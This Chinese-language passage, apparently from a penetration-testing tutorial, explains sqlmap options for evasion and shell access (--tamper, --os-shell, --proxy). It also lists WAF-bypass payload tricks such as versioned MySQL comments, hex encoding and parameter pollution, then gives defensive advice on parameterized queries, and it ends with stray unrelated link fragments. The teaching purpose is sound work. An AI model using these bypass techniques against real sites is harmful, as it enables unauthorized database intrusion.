2开始。--technique指定注入技术。如果你通过手工测试已经知道是布尔盲注直接--techniqueB可以极大提高效率减少无关请求。--dbms如果你已经探明是MySQL使用--dbmsmysqlsqlmap就不会浪费时间去测试其他数据库的payload。--tamper绕过脚本是灵魂。根据WAF类型选择。例如tamperspace2comment将空格替换为/**/between用between替换符号。对于Cloudflare等常见WAF有现成的tamper脚本组合。2. 高效数据获取--batch自动选择默认选项用于非交互式环境。--threads 10使用多线程加快数据获取速度谨慎使用对目标压力大。--search搜索库、表、列。当你不知道具体名称时很有用如--search -C “pass,user”。--sql-shell或--os-shell在成功注入后直接获取一个交互式的SQL命令行或系统shell这是渗透的终极目标之一。但这需要数据库具备相应的高权限。3. 隐蔽与规避--delay 1每个请求延迟1秒降低请求频率避免触发速率限制或警报。--random-agent使用随机的User-Agent头。--proxy通过代理发送请求隐藏真实IP。重要警告Sqlmap的--os-shell功能非常强大它会上传一个用于执行命令的脚本通常是UDF for MySQL或xp_cmdshell for MSSQL。在未经授权的真实网站测试中绝对不要使用此功能这已远超安全测试范畴属于非法入侵行为。仅在你自己完全控制的实验环境如靶场、虚拟机中使用。4.3 云WAF与动态防护绕过思路现代云WAF如阿里云、腾讯云、Cloudflare不再是简单的关键字过滤它们具备行为分析、语义分析能力。1. 混淆与分割注释符内联UNION/**/SELECT-UNION/*aaaa*/SELECT/*bbbb*/1,2,3。用无意义的注释分割关键字。参数污染提交多个同名参数如?id1id2不同中间件解析顺序不同可能绕过WAF的规则匹配。HTTP参数污染HPP类似参数污染在GET/POST/Cookie中同时提交同名参数造成混淆。2. 利用数据库特性MySQL黑魔法利用/*!50000UNION*/ SELECT这是MySQL的特性注释在MySQL版本大于等于5.00.00时才会执行其中的代码WAF可能无法正确解析。字符串拼接‘’(SQL Server),‘||’(Oracle) 将关键字拆开。如SEL’’ECT。十六进制/字符编码将整个查询语句编码。如SELECT-0x53454c454354。或者使用CHAR(83,69,76,69,67,84)来表示SELECT。3. 动态Payload大小写随机化每次请求使用不同的大小写组合。插入冗余空白/换行在关键字中插入%0a换行、%0d回车、%09制表符。使用生僻语法大多数WAF规则集针对常见语法尝试使用不常见的SQL语法结构。4. 资源耗尽型绕过谨慎使用有些WAF有请求体大小限制或检测超时。可以构造一个极其冗长复杂的payload使其超过WAF的处理能力或超时时间从而被放行。但这在实战中风险高容易导致请求失败。5. 防御视角与安全开发建议真正理解攻击是为了更好地防御。作为开发者或安全人员你必须知道如何从根本上杜绝SQL注入。1. 首选方案使用预处理语句参数化查询这是唯一被证明能从根本上防止SQL注入的方法。原理是将SQL语句的结构SELECT * FROM users WHERE id ?与数据?对应的值分开发送给数据库。数据库先编译SQL结构再将数据代入因此用户输入的数据永远不可能改变SQL语句的原有结构。PHP (PDO):$stmt $pdo-prepare(SELECT * FROM users WHERE email :email AND status:status); $stmt-execute([email $email, status $status]); $user $stmt-fetch();Python (SQLAlchemy):from sqlalchemy import text result db.session.execute(text(SELECT * FROM users WHERE id :id), {id: user_id})绝对不要使用字符串拼接来构造SQL语句SELECT * FROM users WHERE id user_id这是万恶之源。2. 严格的输入验证与过滤将预处理语句视为最后一道坚固的防线在此之前还应建立多层校验。白名单验证对于已知有限集合的输入如状态、类型只允许预设的值。例如$order $_GET[order]; if (!in_array($order, [id, name, time])) { $order id; }。类型强制转换对于数字型ID直接转换为整数$id (int)$_GET[id];。最小化权限原则用于连接数据库的账户不应具有FILE、DROP、CREATE等高危权限通常只赋予SELECT、INSERT、UPDATE、DELETE等必要权限。3. 安全的错误处理禁止显示详细错误在生产环境中务必关闭PHP的display_errors将error_reporting设为0或记录到日志文件。自定义一个友好的错误页面而不是将数据库错误堆栈直接抛给用户。使用ORM框架成熟的ORM框架如Laravel的Eloquent, Django的ORM通常内置了预处理语句能大幅降低手写SQL出错的风险。但要注意不当使用ORM也可能产生注入如Laravel中原始查询DB::raw()的使用。4. 纵深防御体系WAFWeb应用防火墙在网络边界部署WAF可以拦截大量已知的、模式化的攻击payload作为一道补充防线。但不能依赖WAF作为唯一的安全措施。定期安全审计与代码扫描使用SAST静态应用安全测试工具扫描源代码使用DAST动态应用安全测试工具扫描运行中的应用定期进行渗透测试。安全编码培训让所有开发人员都深刻理解SQL注入的原理和危害掌握预处理语句的正确用法将安全内化为开发习惯。最后我想说的是SQL注入是一个“古老”但远未过时的漏洞。它在OWASP Top 10中长期占有一席之地。掌握它的攻击手法不是为了去攻击别人而是为了在代码中彻底杜绝它并在安全评估中准确地识别风险。这套从“探针”到“拓展”的四步实战思路更像是一把手术刀帮助你精准地剖析目标。在自家系统上用它来查找漏洞在靶场和CTF中用它来锻炼技艺。永远记住技术是把双刃剑法律的边界和道德的底线是我们每一个从业者不可逾越的红线。
)
)
)
实现100%通过率](http://pic.xiahunao.cn/yaotu/华为OD机试2025C卷-字符串变换最小次数[100分]( Java _ Python3 _ C++ _ C语言 _ JsNode _ Go)实现100%通过率)
实现100%通过率](http://pic.xiahunao.cn/yaotu/华为OD机试2025C卷-内存资源分配[100分]( Java _ Python3 _ C++ _ C语言 _ JsNode _ Go)实现100%通过率)